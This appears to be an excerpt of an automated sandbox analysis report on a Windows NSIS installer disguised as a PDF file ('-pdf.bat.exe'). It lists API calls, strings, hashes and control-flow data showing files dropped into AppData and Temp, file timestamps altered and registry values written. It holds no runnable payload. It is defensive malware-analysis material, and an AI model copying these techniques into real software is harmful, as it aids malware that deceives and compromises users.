                                                                                                                                                • Opcode ID: ba739dc4ba6d18f16267d183e3e068b8daf47d42d4500b1c76a39e8f7c61ad0f
                                                                                                                                                • Instruction ID: dde6768bf825ec23dd98222ce6025154883a759c232661181bb8438464b7c65b
                                                                                                                                                • Opcode Fuzzy Hash: ba739dc4ba6d18f16267d183e3e068b8daf47d42d4500b1c76a39e8f7c61ad0f
                                                                                                                                                • Instruction Fuzzy Hash: F2D1DD71601A10BBDB206F21ED48E2B7BA9FF58355F80493EF545B21E1CA388852DF6D

                                                                                                                                                Control-flow Graph (blocks 380-565, first block 40154a-4015bd; graph rendering not reproduced)
                                                                                                                                                APIs
                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                                                                                                                                • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                                                                                                                                • SetForegroundWindow.USER32 ref: 00401634
                                                                                                                                                • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                                                                                                                                • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,?,?,?,00000000,00000000), ref: 004016FB
                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 0040176A
                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Anvilled,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll), ref: 004017A3
                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Anvilled,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Anvilled,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                                                                                                                                • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                                                                                                                                • lstrcatW.KERNEL32(Call,00000000,Call,000000E9), ref: 00401A82
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll$Call
                                                                                                                                                • API String ID: 3895412863-1182375140
                                                                                                                                                • Opcode ID: 68950bb1ebeb6225cd62330d136d113d7f3aaaaab8d8f59b6ae84e2e14c53e75
                                                                                                                                                • Instruction ID: a1785f87335a1d6f00f335b021900493bb5bdccd3db236d5a22e690d77315129
                                                                                                                                                • Opcode Fuzzy Hash: 68950bb1ebeb6225cd62330d136d113d7f3aaaaab8d8f59b6ae84e2e14c53e75
                                                                                                                                                • Instruction Fuzzy Hash: 89D1D871204301ABD710AF26CD85D2F76A8EF85758F110A3FF456B22E1DB7CD902966E

                                                                                                                                                Control-flow Graph (blocks 566-633, first block 40348f-4034db; graph rendering not reproduced)
                                                                                                                                                APIs
                                                                                                                                                • GetTickCount.KERNEL32 ref: 004034A1
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\-pdf.bat.exe,00000400), ref: 004034BD
                                                                                                                                                  • Part of subcall function 00406A30: GetFileAttributesW.KERNELBASE(00000003,004034D0,C:\Users\user\Desktop\-pdf.bat.exe,80000000,00000003), ref: 00406A34
                                                                                                                                                  • Part of subcall function 00406A30: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 00406A54
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\-pdf.bat.exe,C:\Users\user\Desktop\-pdf.bat.exe,80000000,00000003), ref: 00403507
                                                                                                                                                • GlobalAlloc.KERNELBASE(?,?), ref: 00403655
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\-pdf.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                • API String ID: 2803837635-534134801
                                                                                                                                                • Opcode ID: 599ca7be9194ffd7aba6a4343ff8315617eef4df89bd3b83fc00f7988b37868b
                                                                                                                                                • Instruction ID: 3b142060e7b9412fd979dc1fb42ba0df29582307c8f1f7093b8b137cbf00f437
                                                                                                                                                • Opcode Fuzzy Hash: 599ca7be9194ffd7aba6a4343ff8315617eef4df89bd3b83fc00f7988b37868b
                                                                                                                                                • Instruction Fuzzy Hash: 2D61F571640300ABD730AF24DD86B5A7BA8EB84715F100A3FF541B72E1CB3D9A458B5E

                                                                                                                                                Control-flow Graph (blocks 636-651, first block 405e3d-405e49; graph rendering not reproduced)
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E6F
                                                                                                                                                • lstrlenW.KERNEL32(?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E81
                                                                                                                                                • lstrcatW.KERNEL32(00424230,?,?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E9C
                                                                                                                                                • SetWindowTextW.USER32(00424230,00424230), ref: 00405EB4
                                                                                                                                                • SendMessageW.USER32(?), ref: 00405EDB
                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405EF6
                                                                                                                                                • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405F03
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                                                                                                • String ID: 0BB$0BB$0BB$0BB$C:\Users\user\Desktop
                                                                                                                                                • API String ID: 1759915248-3281311192

                                                                                                                                                APIs
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060E4
                                                                                                                                                  • Part of subcall function 00406C2F: lstrcpynW.KERNEL32(?,?,00000400,00403979,00428D40,NSIS Error), ref: 00406C3C
                                                                                                                                                  • Part of subcall function 00405FBD: SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406156
                                                                                                                                                  • Part of subcall function 00405FBD: CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466,00000000), ref: 00406162
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00424230,?,?,?,?,C:\Users\user\Desktop,00000000,00000000), ref: 004060FA
                                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • lstrlenW.KERNEL32(Call,00424230,?,?,?,?,C:\Users\user\Desktop,00000000,00000000), ref: 004061DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrcpynlstrlen
                                                                                                                                                • String ID: 0BB$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                • API String ID: 698176107-1118408401

                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(00000000,?,?,?), ref: 00402994
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004029D4
                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402A07
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,00000001,?,00000001,?,?,?,?,?,00000001), ref: 00402A1F
                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ByteCharMultiPointerWide$Read
                                                                                                                                                • String ID: 9
                                                                                                                                                • API String ID: 1439708474-2366072709

                                                                                                                                                APIs
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004062CA
                                                                                                                                                • wsprintfW.USER32 ref: 00406306
                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040631A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                • API String ID: 2200240437-1946221925

                                                                                                                                                APIs
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00406B87
                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403DD7,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406BA2
                                                                                                                                                Strings
                                                                                                                                                • n, xrefs: 00406B79
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406B70
                                                                                                                                                • a, xrefs: 00406B80
                                                                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406B74
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                                                                                                                                • API String ID: 1716503409-3027303449

                                                                                                                                                Control-flow Graph

                                                                                                                                                control_flow_graph 837 40225d-402268 838 40233e-402343 837->838 839 40226e-402289 call 40303e * 2 837->839 840 402345-40234a call 405e3d 838->840 849 40228b-402296 GetModuleHandleW 839->849 850 40229c-4022aa LoadLibraryExW 839->850 846 402ea5-402eb7 840->846 851 4022b0-4022c2 call 40637e 849->851 854 402298 849->854 850->851 852 402335-40233c 850->852 857 4022c4-4022ca 851->857 858 402306-40230c call 405e3d 851->858 852->840 854->850 859 4022e6-402304 857->859 860 4022cc-4022e0 call 405e3d 857->860 863 402311-402315 858->863 859->863 860->863 871 4022e2-4022e4 860->871 863->846 864 40231b-402323 call 403dd9 863->864 864->846 870 402329-402330 FreeLibrary 864->870 870->846 871->863
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040228C
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E6F
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E81
                                                                                                                                                  • Part of subcall function 00405E3D: lstrcatW.KERNEL32(00424230,?,?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E9C
                                                                                                                                                  • Part of subcall function 00405E3D: SetWindowTextW.USER32(00424230,00424230), ref: 00405EB4
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?), ref: 00405EDB
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405EF6
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405F03
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 004022A0
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040232A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll
                                                                                                                                                • API String ID: 334405425-3263071273

                                                                                                                                                Control-flow Graph

                                                                                                                                                control_flow_graph 872 402656-4026a8 call 40303e * 2 call 403023 call 4063ba 881 402ea5-402eb7 872->881 882 4026ae-4026b9 872->882 884 4026d1-4026d6 882->884 885 4026bb-4026cf call 40303e lstrlenW 882->885 888 4026e7-4026ec 884->888 889 4026d8-4026e5 call 403002 884->889 892 402700-40271a RegSetValueExW 885->892 888->892 893 4026ee-4026fe call 4032c7 888->893 889->892 895 40271c-402723 RegCloseKey 892->895 893->892 895->881
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq66FB.tmp,00000023,?,00000011,00000002), ref: 004026C3
                                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq66FB.tmp,?,?,00000011,00000002), ref: 00402710
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq66FB.tmp,?,?,00000011,00000002), ref: 0040271D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp
                                                                                                                                                • API String ID: 2655323295-3996896131

                                                                                                                                                Control-flow Graph

                                                                                                                                                control_flow_graph 898 4069fb-406a11 GetModuleHandleA 899 406a13-406a14 call 4062b3 898->899 900 406a1d-406a25 GetProcAddress 898->900 903 406a19-406a1b 899->903 901 406a2b-406a2d 900->901 903->900 903->901
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403918,?), ref: 00406A09
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406A25
                                                                                                                                                  • Part of subcall function 004062B3: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004062CA
                                                                                                                                                  • Part of subcall function 004062B3: wsprintfW.USER32 ref: 00406306
                                                                                                                                                  • Part of subcall function 004062B3: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040631A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                                                                                • API String ID: 2547128583-890815371
                                                                                                                                                APIs
                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405F82
                                                                                                                                                • GetLastError.KERNEL32 ref: 00405F8C
                                                                                                                                                • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405FA5
                                                                                                                                                • GetLastError.KERNEL32 ref: 00405FB3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3449924974-0
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,C:\Users\user\Desktop,?,00000000,004036F8,000000FF,00000000,00000000,?,?), ref: 004032EA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer
                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                • API String ID: 973152223-3370423016
                                                                                                                                                APIs
                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403DCC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00405F29
                                                                                                                                                • GetLastError.KERNEL32 ref: 00405F33
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F21
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                • API String ID: 1375471231-3355392842
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 70312351: GlobalFree.KERNEL32(?), ref: 70312A44
                                                                                                                                                  • Part of subcall function 70312351: GlobalFree.KERNEL32(?), ref: 70312A4A
                                                                                                                                                  • Part of subcall function 70312351: GlobalFree.KERNEL32(?), ref: 70312A50
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 70311738
                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 703117C3
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703117E9
                                                                                                                                                  • Part of subcall function 70311FCB: GlobalAlloc.KERNEL32(?,?), ref: 70311FFA
                                                                                                                                                  • Part of subcall function 703117F7: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,70311708,00000000), ref: 7031189A
                                                                                                                                                  • Part of subcall function 70311F1E: wsprintfW.USER32 ref: 70311F51
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3962662361-0
                                                                                                                                                APIs
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040315B
                                                                                                                                                  • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004036CC,?), ref: 0040313F
                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,004032F7,00000004,C:\Users\user\Desktop,?,00000000,004036F8,000000FF,00000000,00000000,?,?), ref: 0040318E
                                                                                                                                                • SetFilePointer.KERNELBASE(00005080,00000000,00000000,004149F0,-0032BFAE,?,004032F7,00000004,C:\Users\user\Desktop,?,00000000,004036F8,000000FF,00000000,00000000,?), ref: 004032AD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer$CountTick
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1092082344-0
                                                                                                                                                • Opcode ID: 5996c985795e8b5707d76d0be3e92778556d34cb048b6a269bacef030baef48e
                                                                                                                                                • Instruction ID: d2eefc4df71019c2b16fa905559572dc2303f56b63bf2239b88d083b882742d4
                                                                                                                                                • Opcode Fuzzy Hash: 5996c985795e8b5707d76d0be3e92778556d34cb048b6a269bacef030baef48e
                                                                                                                                                • Instruction Fuzzy Hash: F8315CF1912211DBC710AF29EE849667F68EB84326711433FE901B72E0CB399944DB9D
                                                                                                                                                APIs
                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                • Opcode ID: fe6b0462bbb9c812055640b7e05a812a5f0f6476a15b8fe0613a818189b17234
                                                                                                                                                • Instruction ID: b0fab6ada048a007bc7a9e7ea159b859fb2c46f1cf0919f9de2b856f0b768ccb
                                                                                                                                                • Opcode Fuzzy Hash: fe6b0462bbb9c812055640b7e05a812a5f0f6476a15b8fe0613a818189b17234
                                                                                                                                                • Instruction Fuzzy Hash: 3501B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A21C0D7B86904866A
                                                                                                                                                APIs
                                                                                                                                                • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                • Opcode ID: 21baafe9a7a0f76613877036fe6656a1d903344fa510fbd339b417530e455d25
                                                                                                                                                • Instruction ID: 290020a6ffb3b0b642d393fb7515e003cd99aebe452f8161eadcedbee24de40e
                                                                                                                                                • Opcode Fuzzy Hash: 21baafe9a7a0f76613877036fe6656a1d903344fa510fbd339b417530e455d25
                                                                                                                                                • Instruction Fuzzy Hash: 65014732B102309BD7296F28EC08B2A3698A790711F55053EF901F72F1D6B8CC06839C
                                                                                                                                                APIs
                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseDeleteValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2831762973-0
                                                                                                                                                • Opcode ID: 58e93c502c6760cf7afac41f66f3caaeb4af238a1542128eb1103078922c963e
                                                                                                                                                • Instruction ID: 362cb4f6b20b44c4732fe0c2e8830287d718b01241407342bacb51c37ffe1250
                                                                                                                                                • Opcode Fuzzy Hash: 58e93c502c6760cf7afac41f66f3caaeb4af238a1542128eb1103078922c963e
                                                                                                                                                • Instruction Fuzzy Hash: D6F02433645600A7E210ABA49D4AA7E765DAB903A2F11053FF642B61C4CEBE8C46866D
                                                                                                                                                APIs
                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00402061
                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0040206C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                • Opcode ID: 891da5ed0a96c49853c0618874e93badcd3494bf22b074912de49e1286eaee8a
                                                                                                                                                • Instruction ID: d3ea980f862b26b5144c0637eecc05b71e9f62faeec01463a38ba2c80611de59
                                                                                                                                                • Opcode Fuzzy Hash: 891da5ed0a96c49853c0618874e93badcd3494bf22b074912de49e1286eaee8a
                                                                                                                                                • Instruction Fuzzy Hash: 5EE026726083009FE314AF20E94E96AB768EB40326F20443FF940B40C1CBBE2C4186BE
                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004034D0,C:\Users\user\Desktop\-pdf.bat.exe,80000000,00000003), ref: 00406A34
                                                                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 00406A54
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                • String ID:
